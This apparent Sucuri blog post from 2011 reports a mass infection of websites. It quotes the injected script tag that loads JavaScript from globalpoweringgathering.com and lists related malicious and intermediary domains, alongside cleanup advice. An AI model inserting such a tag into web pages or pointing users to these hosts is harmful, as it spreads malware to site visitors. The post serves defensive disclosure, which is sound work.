• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

Mass infections – globalpoweringgathering.com

April 25, 2011David Dede

FacebookTwitterSubscribe

We first detected malware from globalpoweringgathering.com almost a month ago, and posted on our blog about it. But in the last few days, we started to see a big increase in the number of sites infected with it.

We were able to catalog almost 3 thousand sites with this malware and Google lists almost 2 thousand sites in their safe browsing page (and it is growing each day – just yesterday it was less than 1 thousand):

Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 1815 domain(s), including clonestop.com/, warseer.com/, showbiz411.com/.


On our original post, we detailed the malware which was injecting an encoded javascript directly in the WordPress database. However, on the latest infections, we are seeing the following code added directly to the HTML or PHP files (with no obfuscation):

<script src="http://globalpoweringgathering.com/in.php?n=15"..

With some variations, with just a number changing:

http://globalpoweringgathering.com/in.php?n=15
http://globalpoweringgathering.com/in.php?n=25
http://globalpoweringgathering.com/in.php?n=2
http://globalpoweringgathering.com/in.php?n=9

Note that these are very similar to the “Hilary Kneber” malware distributed by these domains (hosted on the same IP addresses):

globalpoweringgathering.com
lessthenaminutehandle.com
lessthenaseconddeal.com
welcometotheglobalisnet.com

How are these sites getting hacked?

We are seeing multiple causes. The most common is related the usage of old versions of web applications (like WordPress, Joomla, etc). However, we are also seeing HTML-only sites hacked that are getting compromised via FTP due to stolen passwords. So make sure your sites are updated and change your passwords (making sure to use a strong password, that your desktop is not compromised, etc).

Other domains being used as intermediaries:

543ge.cz.cc
gtrregrw.cz.cc
leased-ltx.cz.cc
legacy-tools.cz.cc
notyfiwgt.co.cc
rthlsinks.cz.cc
sajko.co.cc
upsreleased.cz.cc
wretery.cz.cc
avi7o.co.cc
tempviews.cz.cc
viables.cz.cc

If you need any help cleaning up an infected site (or someone to do it for you), let us know.

FacebookTwitterSubscribe

Categories: Website Malware InfectionsTags: Hacked Websites, Malware Updates, Website Blacklist

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Reader Interactions

Comments

  1. tino

    April 26, 2011

    Thanks for the info. My HTML site was compromised.

  2. Matteo Campofiorito

    April 26, 2011

    Do you have some deeper details about attack vector used to compromise websites targeted by this “worm”? Do you think that a WordPress 3.0.4 version could be vulnerable to this exploit?

  3. Guest

    May 18, 2011

    On 2 joomla sites I had over 10k files infected: index.html and *.php

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.